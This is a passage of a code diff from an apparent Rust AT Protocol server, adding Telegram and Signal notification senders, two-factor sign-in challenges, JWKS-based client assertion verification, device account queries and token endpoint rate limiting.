+
e
224
+
)));
225
+
}
226
+
}
227
+
}
228
+
229
+
Err(SendError::MaxRetriesExceeded(
230
+
last_error.unwrap_or_else(|| "Unknown error".to_string()),
231
+
))
232
+
}
233
+
}
234
+
235
+
pub struct TelegramSender {
236
+
bot_token: String,
237
+
http_client: Client,
238
+
}
239
+
240
+
impl TelegramSender {
241
+
pub fn new(bot_token: String) -> Self {
242
+
Self {
243
+
bot_token,
244
+
http_client: create_http_client(),
245
+
}
246
+
}
247
+
248
+
pub fn from_env() -> Option<Self> {
249
+
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
250
+
Some(Self::new(bot_token))
251
+
}
252
+
}
253
+
254
+
#[async_trait]
255
+
impl NotificationSender for TelegramSender {
256
+
fn channel(&self) -> NotificationChannel {
257
+
NotificationChannel::Telegram
258
+
}
259
+
260
+
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
261
+
let chat_id = ¬ification.recipient;
262
+
let subject = notification.subject.as_deref().unwrap_or("Notification");
263
+
let text = format!("*{}*\n\n{}", subject, notification.body);
264
+
265
+
let url = format!(
266
+
"https://api.telegram.org/bot{}/sendMessage",
267
+
self.bot_token
268
+
);
269
+
270
+
let payload = json!({
271
+
"chat_id": chat_id,
272
+
"text": text,
273
+
"parse_mode": "Markdown"
274
+
});
275
+
276
+
let mut last_error = None;
277
+
for attempt in 0..MAX_RETRIES {
278
+
let result = self
279
+
.http_client
280
+
.post(&url)
281
+
.json(&payload)
282
+
.send()
283
+
.await;
284
+
285
+
match result {
286
+
Ok(response) => {
287
+
if response.status().is_success() {
288
+
return Ok(());
289
+
}
290
+
291
+
let status = response.status();
292
+
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
293
+
last_error = Some(format!("Telegram API returned {}", status));
294
+
retry_delay(attempt).await;
295
+
continue;
296
+
}
297
+
298
+
let body = response.text().await.unwrap_or_default();
299
+
return Err(SendError::ExternalService(format!(
300
+
"Telegram API returned {}: {}",
301
+
status, body
302
+
)));
303
+
}
304
+
Err(e) => {
305
+
if e.is_timeout() {
306
+
if attempt < MAX_RETRIES - 1 {
307
+
last_error = Some(format!("Telegram request timed out"));
308
+
retry_delay(attempt).await;
309
+
continue;
310
+
}
311
+
return Err(SendError::Timeout);
312
+
}
313
+
return Err(SendError::ExternalService(format!(
314
+
"Telegram request failed: {}",
315
+
e
316
+
)));
317
+
}
318
+
}
319
+
}
320
+
321
+
Err(SendError::MaxRetriesExceeded(
322
+
last_error.unwrap_or_else(|| "Unknown error".to_string()),
323
+
))
324
+
}
325
+
}
326
+
327
+
pub struct SignalSender {
328
+
signal_cli_path: String,
329
+
sender_number: String,
330
+
}
331
+
332
+
impl SignalSender {
333
+
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
334
+
Self {
335
+
signal_cli_path,
336
+
sender_number,
337
+
}
338
+
}
339
+
340
+
pub fn from_env() -> Option<Self> {
341
+
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
342
+
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
343
+
let sender_number = std::env::var("SIGNAL_SENDER_NUMBER").ok()?;
344
+
Some(Self::new(signal_cli_path, sender_number))
345
+
}
346
+
}
347
+
348
+
#[async_trait]
349
+
impl NotificationSender for SignalSender {
350
+
fn channel(&self) -> NotificationChannel {
351
+
NotificationChannel::Signal
352
+
}
353
+
354
+
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
355
+
let recipient = ¬ification.recipient;
356
+
357
+
if !is_valid_phone_number(recipient) {
358
+
return Err(SendError::InvalidRecipient(format!(
359
+
"Invalid phone number format: {}",
360
+
recipient
361
+
)));
362
+
}
363
+
364
+
let subject = notification.subject.as_deref().unwrap_or("Notification");
365
+
let message = format!("{}\n\n{}", subject, notification.body);
366
+
367
+
let output = Command::new(&self.signal_cli_path)
368
+
.arg("-u")
369
+
.arg(&self.sender_number)
370
+
.arg("send")
371
+
.arg("-m")
372
+
.arg(&message)
373
+
.arg(recipient)
374
+
.output()
375
+
.await?;
376
+
377
+
if !output.status.success() {
378
+
let stderr = String::from_utf8_lossy(&output.stderr);
379
+
return Err(SendError::ExternalService(format!(
380
+
"signal-cli failed: {}",
381
+
stderr
382
+
)));
383
+
}
384
+
385
+
Ok(())
386
+
}
387
+
}
+36
src/notifications/service.rs
+36
src/notifications/service.rs
···
443
)
444
.await
445
}
446
+
447
+
pub async fn enqueue_2fa_code(
448
+
db: &PgPool,
449
+
user_id: Uuid,
450
+
code: &str,
451
+
hostname: &str,
452
+
) -> Result<Uuid, sqlx::Error> {
453
+
let prefs = get_user_notification_prefs(db, user_id).await?;
454
+
455
+
let body = format!(
456
+
"Hello @{},\n\nYour sign-in verification code is: {}\n\nThis code will expire in 10 minutes.\n\nIf you did not request this, please secure your account immediately.",
457
+
prefs.handle, code
458
+
);
459
+
460
+
enqueue_notification(
461
+
db,
462
+
NewNotification::new(
463
+
user_id,
464
+
prefs.channel,
465
+
super::types::NotificationType::TwoFactorCode,
466
+
prefs.email.clone(),
467
+
Some(format!("Sign-in Verification - {}", hostname)),
468
+
body,
469
+
),
470
+
)
471
+
.await
472
+
}
473
+
474
+
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
475
+
match channel {
476
+
NotificationChannel::Email => "email",
477
+
NotificationChannel::Discord => "Discord",
478
+
NotificationChannel::Telegram => "Telegram",
479
+
NotificationChannel::Signal => "Signal",
480
+
}
481
+
}
+1
src/notifications/types.rs
+1
src/notifications/types.rs
+267
-7
src/oauth/client.rs
+267
-7
src/oauth/client.rs
···
57
#[derive(Clone)]
58
pub struct ClientMetadataCache {
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
60
http_client: Client,
61
cache_ttl_secs: u64,
62
}
···
66
cached_at: std::time::Instant,
67
}
68
69
impl ClientMetadataCache {
70
pub fn new(cache_ttl_secs: u64) -> Self {
71
Self {
72
cache: Arc::new(RwLock::new(HashMap::new())),
73
-
http_client: Client::new(),
74
cache_ttl_secs,
75
}
76
}
···
101
Ok(metadata)
102
}
103
104
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
105
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
106
return Err(OAuthError::InvalidClient(
···
244
}
245
}
246
247
-
pub fn verify_client_auth(
248
metadata: &ClientMetadata,
249
client_auth: &super::ClientAuth,
250
) -> Result<(), OAuthError> {
···
258
)),
259
260
("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
261
-
verify_private_key_jwt(metadata, client_assertion)
262
}
263
264
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
···
284
}
285
}
286
287
-
fn verify_private_key_jwt(
288
metadata: &ClientMetadata,
289
client_assertion: &str,
290
) -> Result<(), OAuthError> {
···
311
alg
312
)));
313
}
314
315
let payload_bytes = URL_SAFE_NO_PAD
316
.decode(parts[1])
···
353
}
354
}
355
356
-
if metadata.jwks.is_none() && metadata.jwks_uri.is_none() {
357
return Err(OAuthError::InvalidClient(
358
-
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
359
));
360
}
361
362
Err(OAuthError::InvalidClient(
363
-
"private_key_jwt signature verification not yet implemented - use 'none' auth method".to_string(),
364
))
365
}
···
57
#[derive(Clone)]
58
pub struct ClientMetadataCache {
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
60
+
jwks_cache: Arc<RwLock<HashMap<String, CachedJwks>>>,
61
http_client: Client,
62
cache_ttl_secs: u64,
63
}
···
67
cached_at: std::time::Instant,
68
}
69
70
+
struct CachedJwks {
71
+
jwks: serde_json::Value,
72
+
cached_at: std::time::Instant,
73
+
}
74
+
75
impl ClientMetadataCache {
76
pub fn new(cache_ttl_secs: u64) -> Self {
77
Self {
78
cache: Arc::new(RwLock::new(HashMap::new())),
79
+
jwks_cache: Arc::new(RwLock::new(HashMap::new())),
80
+
http_client: Client::builder()
81
+
.timeout(std::time::Duration::from_secs(30))
82
+
.connect_timeout(std::time::Duration::from_secs(10))
83
+
.build()
84
+
.unwrap_or_else(|_| Client::new()),
85
cache_ttl_secs,
86
}
87
}
···
112
Ok(metadata)
113
}
114
115
+
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
116
+
if let Some(jwks) = &metadata.jwks {
117
+
return Ok(jwks.clone());
118
+
}
119
+
120
+
let jwks_uri = metadata.jwks_uri.as_ref().ok_or_else(|| {
121
+
OAuthError::InvalidClient(
122
+
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
123
+
)
124
+
})?;
125
+
126
+
{
127
+
let cache = self.jwks_cache.read().await;
128
+
if let Some(cached) = cache.get(jwks_uri) {
129
+
if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
130
+
return Ok(cached.jwks.clone());
131
+
}
132
+
}
133
+
}
134
+
135
+
let jwks = self.fetch_jwks(jwks_uri).await?;
136
+
137
+
{
138
+
let mut cache = self.jwks_cache.write().await;
139
+
cache.insert(
140
+
jwks_uri.clone(),
141
+
CachedJwks {
142
+
jwks: jwks.clone(),
143
+
cached_at: std::time::Instant::now(),
144
+
},
145
+
);
146
+
}
147
+
148
+
Ok(jwks)
149
+
}
150
+
151
+
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
152
+
if !jwks_uri.starts_with("https://") {
153
+
if !jwks_uri.starts_with("http://")
154
+
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))
155
+
{
156
+
return Err(OAuthError::InvalidClient(
157
+
"jwks_uri must use https (except for localhost)".to_string(),
158
+
));
159
+
}
160
+
}
161
+
162
+
let response = self
163
+
.http_client
164
+
.get(jwks_uri)
165
+
.header("Accept", "application/json")
166
+
.send()
167
+
.await
168
+
.map_err(|e| {
169
+
OAuthError::InvalidClient(format!("Failed to fetch JWKS from {}: {}", jwks_uri, e))
170
+
})?;
171
+
172
+
if !response.status().is_success() {
173
+
return Err(OAuthError::InvalidClient(format!(
174
+
"Failed to fetch JWKS: HTTP {}",
175
+
response.status()
176
+
)));
177
+
}
178
+
179
+
let jwks: serde_json::Value = response
180
+
.json()
181
+
.await
182
+
.map_err(|e| OAuthError::InvalidClient(format!("Invalid JWKS JSON: {}", e)))?;
183
+
184
+
if jwks.get("keys").and_then(|k| k.as_array()).is_none() {
185
+
return Err(OAuthError::InvalidClient(
186
+
"JWKS must contain a 'keys' array".to_string(),
187
+
));
188
+
}
189
+
190
+
Ok(jwks)
191
+
}
192
+
193
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
194
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
195
return Err(OAuthError::InvalidClient(
···
333
}
334
}
335
336
+
pub async fn verify_client_auth(
337
+
cache: &ClientMetadataCache,
338
metadata: &ClientMetadata,
339
client_auth: &super::ClientAuth,
340
) -> Result<(), OAuthError> {
···
348
)),
349
350
("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
351
+
verify_private_key_jwt_async(cache, metadata, client_assertion).await
352
}
353
354
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
···
374
}
375
}
376
377
+
async fn verify_private_key_jwt_async(
378
+
cache: &ClientMetadataCache,
379
metadata: &ClientMetadata,
380
client_assertion: &str,
381
) -> Result<(), OAuthError> {
···
402
alg
403
)));
404
}
405
+
406
+
let kid = header.get("kid").and_then(|k| k.as_str());
407
408
let payload_bytes = URL_SAFE_NO_PAD
409
.decode(parts[1])
···
446
}
447
}
448
449
+
let jwks = cache.get_jwks(metadata).await?;
450
+
let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| {
451
+
OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string())
452
+
})?;
453
+
454
+
let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid {
455
+
keys.iter()
456
+
.filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid))
457
+
.collect()
458
+
} else {
459
+
keys.iter().collect()
460
+
};
461
+
462
+
if matching_keys.is_empty() {
463
return Err(OAuthError::InvalidClient(
464
+
"No matching key found in client JWKS".to_string(),
465
));
466
}
467
468
+
let signing_input = format!("{}.{}", parts[0], parts[1]);
469
+
let signature_bytes = URL_SAFE_NO_PAD
470
+
.decode(parts[2])
471
+
.map_err(|_| OAuthError::InvalidClient("Invalid signature encoding".to_string()))?;
472
+
473
+
for key in matching_keys {
474
+
let key_alg = key.get("alg").and_then(|a| a.as_str());
475
+
if key_alg.is_some() && key_alg != Some(alg) {
476
+
continue;
477
+
}
478
+
479
+
let kty = key.get("kty").and_then(|k| k.as_str()).unwrap_or("");
480
+
481
+
let verified = match (alg, kty) {
482
+
("ES256", "EC") => verify_es256(key, &signing_input, &signature_bytes),
483
+
("ES384", "EC") => verify_es384(key, &signing_input, &signature_bytes),
484
+
("RS256" | "RS384" | "RS512", "RSA") => {
485
+
verify_rsa(alg, key, &signing_input, &signature_bytes)
486
+
}
487
+
("EdDSA", "OKP") => verify_eddsa(key, &signing_input, &signature_bytes),
488
+
_ => continue,
489
+
};
490
+
491
+
if verified.is_ok() {
492
+
return Ok(());
493
+
}
494
+
}
495
+
496
Err(OAuthError::InvalidClient(
497
+
"client_assertion signature verification failed".to_string(),
498
+
))
499
+
}
500
+
501
+
fn verify_es256(
502
+
key: &serde_json::Value,
503
+
signing_input: &str,
504
+
signature: &[u8],
505
+
) -> Result<(), OAuthError> {
506
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
507
+
use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
508
+
use p256::EncodedPoint;
509
+
510
+
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
511
+
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
512
+
})?;
513
+
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
514
+
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
515
+
})?;
516
+
517
+
let x_bytes = URL_SAFE_NO_PAD.decode(x)
518
+
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
519
+
let y_bytes = URL_SAFE_NO_PAD.decode(y)
520
+
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
521
+
522
+
let mut point_bytes = vec![0x04];
523
+
point_bytes.extend_from_slice(&x_bytes);
524
+
point_bytes.extend_from_slice(&y_bytes);
525
+
526
+
let point = EncodedPoint::from_bytes(&point_bytes)
527
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
528
+
let verifying_key = VerifyingKey::from_encoded_point(&point)
529
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
530
+
531
+
let sig = Signature::from_slice(signature)
532
+
.map_err(|_| OAuthError::InvalidClient("Invalid ES256 signature format".to_string()))?;
533
+
534
+
verifying_key
535
+
.verify(signing_input.as_bytes(), &sig)
536
+
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
537
+
}
538
+
539
+
fn verify_es384(
540
+
key: &serde_json::Value,
541
+
signing_input: &str,
542
+
signature: &[u8],
543
+
) -> Result<(), OAuthError> {
544
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
545
+
use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier};
546
+
use p384::EncodedPoint;
547
+
548
+
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
549
+
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
550
+
})?;
551
+
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
552
+
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
553
+
})?;
554
+
555
+
let x_bytes = URL_SAFE_NO_PAD.decode(x)
556
+
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
557
+
let y_bytes = URL_SAFE_NO_PAD.decode(y)
558
+
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
559
+
560
+
let mut point_bytes = vec![0x04];
561
+
point_bytes.extend_from_slice(&x_bytes);
562
+
point_bytes.extend_from_slice(&y_bytes);
563
+
564
+
let point = EncodedPoint::from_bytes(&point_bytes)
565
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
566
+
let verifying_key = VerifyingKey::from_encoded_point(&point)
567
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
568
+
569
+
let sig = Signature::from_slice(signature)
570
+
.map_err(|_| OAuthError::InvalidClient("Invalid ES384 signature format".to_string()))?;
571
+
572
+
verifying_key
573
+
.verify(signing_input.as_bytes(), &sig)
574
+
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
575
+
}
576
+
577
+
fn verify_rsa(
578
+
_alg: &str,
579
+
_key: &serde_json::Value,
580
+
_signing_input: &str,
581
+
_signature: &[u8],
582
+
) -> Result<(), OAuthError> {
583
+
Err(OAuthError::InvalidClient(
584
+
"RSA signature verification not yet supported - use EC keys".to_string(),
585
))
586
}
587
+
588
+
fn verify_eddsa(
589
+
key: &serde_json::Value,
590
+
signing_input: &str,
591
+
signature: &[u8],
592
+
) -> Result<(), OAuthError> {
593
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
594
+
use ed25519_dalek::{Signature, Verifier, VerifyingKey};
595
+
596
+
let crv = key.get("crv").and_then(|c| c.as_str()).unwrap_or("");
597
+
if crv != "Ed25519" {
598
+
return Err(OAuthError::InvalidClient(format!(
599
+
"Unsupported EdDSA curve: {}",
600
+
crv
601
+
)));
602
+
}
603
+
604
+
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
605
+
OAuthError::InvalidClient("Missing x in OKP key".to_string())
606
+
})?;
607
+
608
+
let x_bytes = URL_SAFE_NO_PAD.decode(x)
609
+
.map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?;
610
+
611
+
let key_bytes: [u8; 32] = x_bytes.try_into()
612
+
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?;
613
+
614
+
let verifying_key = VerifyingKey::from_bytes(&key_bytes)
615
+
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?;
616
+
617
+
let sig_bytes: [u8; 64] = signature.try_into()
618
+
.map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?;
619
+
620
+
let sig = Signature::from_bytes(&sig_bytes);
621
+
622
+
verifying_key
623
+
.verify(signing_input.as_bytes(), &sig)
624
+
.map_err(|_| OAuthError::InvalidClient("EdDSA signature verification failed".to_string()))
625
+
}
+62
src/oauth/db/device.rs
+62
src/oauth/db/device.rs
···
1
+
use chrono::{DateTime, Utc};
2
use sqlx::PgPool;
3
4
use super::super::{DeviceData, OAuthError};
5
+
6
+
pub struct DeviceAccountRow {
7
+
pub did: String,
8
+
pub handle: String,
9
+
pub email: String,
10
+
pub last_used_at: DateTime<Utc>,
11
+
}
12
13
pub async fn create_device(
14
pool: &PgPool,
···
102
103
Ok(())
104
}
105
+
106
+
pub async fn get_device_accounts(
107
+
pool: &PgPool,
108
+
device_id: &str,
109
+
) -> Result<Vec<DeviceAccountRow>, OAuthError> {
110
+
let rows = sqlx::query!(
111
+
r#"
112
+
SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at
113
+
FROM oauth_account_device ad
114
+
JOIN users u ON u.did = ad.did
115
+
WHERE ad.device_id = $1
116
+
AND u.deactivated_at IS NULL
117
+
AND u.takedown_ref IS NULL
118
+
ORDER BY ad.updated_at DESC
119
+
"#,
120
+
device_id
121
+
)
122
+
.fetch_all(pool)
123
+
.await?;
124
+
125
+
Ok(rows
126
+
.into_iter()
127
+
.map(|r| DeviceAccountRow {
128
+
did: r.did,
129
+
handle: r.handle,
130
+
email: r.email,
131
+
last_used_at: r.last_used_at,
132
+
})
133
+
.collect())
134
+
}
135
+
136
+
pub async fn verify_account_on_device(
137
+
pool: &PgPool,
138
+
device_id: &str,
139
+
did: &str,
140
+
) -> Result<bool, OAuthError> {
141
+
let row = sqlx::query!(
142
+
r#"
143
+
SELECT 1 as exists
144
+
FROM oauth_account_device ad
145
+
JOIN users u ON u.did = ad.did
146
+
WHERE ad.device_id = $1
147
+
AND ad.did = $2
148
+
AND u.deactivated_at IS NULL
149
+
AND u.takedown_ref IS NULL
150
+
"#,
151
+
device_id,
152
+
did
153
+
)
154
+
.fetch_optional(pool)
155
+
.await?;
156
+
157
+
Ok(row.is_some())
158
+
}
+8
-1
src/oauth/db/mod.rs
+8
-1
src/oauth/db/mod.rs
···
4
mod helpers;
5
mod request;
6
mod token;
7
8
pub use client::{get_authorized_client, upsert_authorized_client};
9
pub use device::{
10
-
create_device, delete_device, get_device, update_device_last_seen, upsert_account_device,
11
};
12
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
13
pub use request::{
···
20
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
21
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
22
};
···
4
mod helpers;
5
mod request;
6
mod token;
7
+
mod two_factor;
8
9
pub use client::{get_authorized_client, upsert_authorized_client};
10
pub use device::{
11
+
create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
12
+
upsert_account_device, verify_account_on_device, DeviceAccountRow,
13
};
14
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
15
pub use request::{
···
22
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
23
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
24
};
25
+
pub use two_factor::{
26
+
check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge,
27
+
delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code,
28
+
get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge,
29
+
};
+153
src/oauth/db/two_factor.rs
+153
src/oauth/db/two_factor.rs
···
···
1
+
use chrono::{DateTime, Duration, Utc};
2
+
use rand::Rng;
3
+
use sqlx::PgPool;
4
+
use uuid::Uuid;
5
+
6
+
use super::super::OAuthError;
7
+
8
+
pub struct TwoFactorChallenge {
9
+
pub id: Uuid,
10
+
pub did: String,
11
+
pub request_uri: String,
12
+
pub code: String,
13
+
pub attempts: i32,
14
+
pub created_at: DateTime<Utc>,
15
+
pub expires_at: DateTime<Utc>,
16
+
}
17
+
18
+
pub fn generate_2fa_code() -> String {
19
+
let mut rng = rand::thread_rng();
20
+
let code: u32 = rng.gen_range(0..1_000_000);
21
+
format!("{:06}", code)
22
+
}
23
+
24
+
pub async fn create_2fa_challenge(
25
+
pool: &PgPool,
26
+
did: &str,
27
+
request_uri: &str,
28
+
) -> Result<TwoFactorChallenge, OAuthError> {
29
+
let code = generate_2fa_code();
30
+
let expires_at = Utc::now() + Duration::minutes(10);
31
+
32
+
let row = sqlx::query!(
33
+
r#"
34
+
INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)
35
+
VALUES ($1, $2, $3, $4)
36
+
RETURNING id, did, request_uri, code, attempts, created_at, expires_at
37
+
"#,
38
+
did,
39
+
request_uri,
40
+
code,
41
+
expires_at,
42
+
)
43
+
.fetch_one(pool)
44
+
.await?;
45
+
46
+
Ok(TwoFactorChallenge {
47
+
id: row.id,
48
+
did: row.did,
49
+
request_uri: row.request_uri,
50
+
code: row.code,
51
+
attempts: row.attempts,
52
+
created_at: row.created_at,
53
+
expires_at: row.expires_at,
54
+
})
55
+
}
56
+
57
+
pub async fn get_2fa_challenge(
58
+
pool: &PgPool,
59
+
request_uri: &str,
60
+
) -> Result<Option<TwoFactorChallenge>, OAuthError> {
61
+
let row = sqlx::query!(
62
+
r#"
63
+
SELECT id, did, request_uri, code, attempts, created_at, expires_at
64
+
FROM oauth_2fa_challenge
65
+
WHERE request_uri = $1
66
+
"#,
67
+
request_uri
68
+
)
69
+
.fetch_optional(pool)
70
+
.await?;
71
+
72
+
Ok(row.map(|r| TwoFactorChallenge {
73
+
id: r.id,
74
+
did: r.did,
75
+
request_uri: r.request_uri,
76
+
code: r.code,
77
+
attempts: r.attempts,
78
+
created_at: r.created_at,
79
+
expires_at: r.expires_at,
80
+
}))
81
+
}
82
+
83
+
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
84
+
let row = sqlx::query!(
85
+
r#"
86
+
UPDATE oauth_2fa_challenge
87
+
SET attempts = attempts + 1
88
+
WHERE id = $1
89
+
RETURNING attempts
90
+
"#,
91
+
id
92
+
)
93
+
.fetch_one(pool)
94
+
.await?;
95
+
96
+
Ok(row.attempts)
97
+
}
98
+
99
+
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
100
+
sqlx::query!(
101
+
r#"
102
+
DELETE FROM oauth_2fa_challenge WHERE id = $1
103
+
"#,
104
+
id
105
+
)
106
+
.execute(pool)
107
+
.await?;
108
+
109
+
Ok(())
110
+
}
111
+
112
+
pub async fn delete_2fa_challenge_by_request_uri(
113
+
pool: &PgPool,
114
+
request_uri: &str,
115
+
) -> Result<(), OAuthError> {
116
+
sqlx::query!(
117
+
r#"
118
+
DELETE FROM oauth_2fa_challenge WHERE request_uri = $1
119
+
"#,
120
+
request_uri
121
+
)
122
+
.execute(pool)
123
+
.await?;
124
+
125
+
Ok(())
126
+
}
127
+
128
+
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
129
+
let result = sqlx::query!(
130
+
r#"
131
+
DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()
132
+
"#
133
+
)
134
+
.execute(pool)
135
+
.await?;
136
+
137
+
Ok(result.rows_affected())
138
+
}
139
+
140
+
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
141
+
let row = sqlx::query!(
142
+
r#"
143
+
SELECT two_factor_enabled
144
+
FROM users
145
+
WHERE did = $1
146
+
"#,
147
+
did
148
+
)
149
+
.fetch_optional(pool)
150
+
.await?;
151
+
152
+
Ok(row.map(|r| r.two_factor_enabled).unwrap_or(false))
153
+
}
+1
-1
src/oauth/endpoints/token/grants.rs
+1
-1
src/oauth/endpoints/token/grants.rs
+24
src/oauth/endpoints/token/mod.rs
+24
src/oauth/endpoints/token/mod.rs
···
19
};
20
pub use types::{TokenRequest, TokenResponse};
21
22
pub async fn token_endpoint(
23
State(state): State<AppState>,
24
headers: HeaderMap,
25
Form(request): Form<TokenRequest>,
26
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
27
let dpop_proof = headers
28
.get("DPoP")
29
.and_then(|v| v.to_str().ok())
···
19
};
20
pub use types::{TokenRequest, TokenResponse};
21
22
+
fn extract_client_ip(headers: &HeaderMap) -> String {
23
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
24
+
if let Ok(value) = forwarded.to_str() {
25
+
if let Some(first_ip) = value.split(',').next() {
26
+
return first_ip.trim().to_string();
27
+
}
28
+
}
29
+
}
30
+
if let Some(real_ip) = headers.get("x-real-ip") {
31
+
if let Ok(value) = real_ip.to_str() {
32
+
return value.trim().to_string();
33
+
}
34
+
}
35
+
"unknown".to_string()
36
+
}
37
+
38
pub async fn token_endpoint(
39
State(state): State<AppState>,
40
headers: HeaderMap,
41
Form(request): Form<TokenRequest>,
42
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
43
+
let client_ip = extract_client_ip(&headers);
44
+
if state.rate_limiters.oauth_token.check_key(&client_ip).is_err() {
45
+
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
46
+
return Err(OAuthError::InvalidRequest(
47
+
"Too many requests. Please try again later.".to_string(),
48
+
));
49
+
}
50
+
51
let dpop_proof = headers
52
.get("DPoP")
53
.and_then(|v| v.to_str().ok())
+2
src/oauth/mod.rs
+2
src/oauth/mod.rs
···
5
pub mod client;
6
pub mod endpoints;
7
pub mod error;
8
+
pub mod templates;
9
pub mod verify;
10
11
pub use types::*;
12
pub use error::OAuthError;
13
pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
14
+
pub use templates::{DeviceAccount, mask_email};
+719
src/oauth/templates.rs
+719
src/oauth/templates.rs
···
···
1
+
use chrono::{DateTime, Utc};
2
+
3
+
fn base_styles() -> &'static str {
4
+
r#"
5
+
:root {
6
+
--primary: #0085ff;
7
+
--primary-hover: #0077e6;
8
+
--primary-contrast: #ffffff;
9
+
--primary-100: #dbeafe;
10
+
--primary-400: #60a5fa;
11
+
--primary-600-30: rgba(37, 99, 235, 0.3);
12
+
--contrast-0: #ffffff;
13
+
--contrast-25: #f8f9fa;
14
+
--contrast-50: #f1f3f5;
15
+
--contrast-100: #e9ecef;
16
+
--contrast-200: #dee2e6;
17
+
--contrast-300: #ced4da;
18
+
--contrast-400: #adb5bd;
19
+
--contrast-500: #6b7280;
20
+
--contrast-600: #4b5563;
21
+
--contrast-700: #374151;
22
+
--contrast-800: #1f2937;
23
+
--contrast-900: #111827;
24
+
--error: #dc2626;
25
+
--error-bg: #fef2f2;
26
+
--success: #059669;
27
+
--success-bg: #ecfdf5;
28
+
}
29
+
30
+
@media (prefers-color-scheme: dark) {
31
+
:root {
32
+
--contrast-0: #111827;
33
+
--contrast-25: #1f2937;
34
+
--contrast-50: #374151;
35
+
--contrast-100: #4b5563;
36
+
--contrast-200: #6b7280;
37
+
--contrast-300: #9ca3af;
38
+
--contrast-400: #d1d5db;
39
+
--contrast-500: #e5e7eb;
40
+
--contrast-600: #f3f4f6;
41
+
--contrast-700: #f9fafb;
42
+
--contrast-800: #ffffff;
43
+
--contrast-900: #ffffff;
44
+
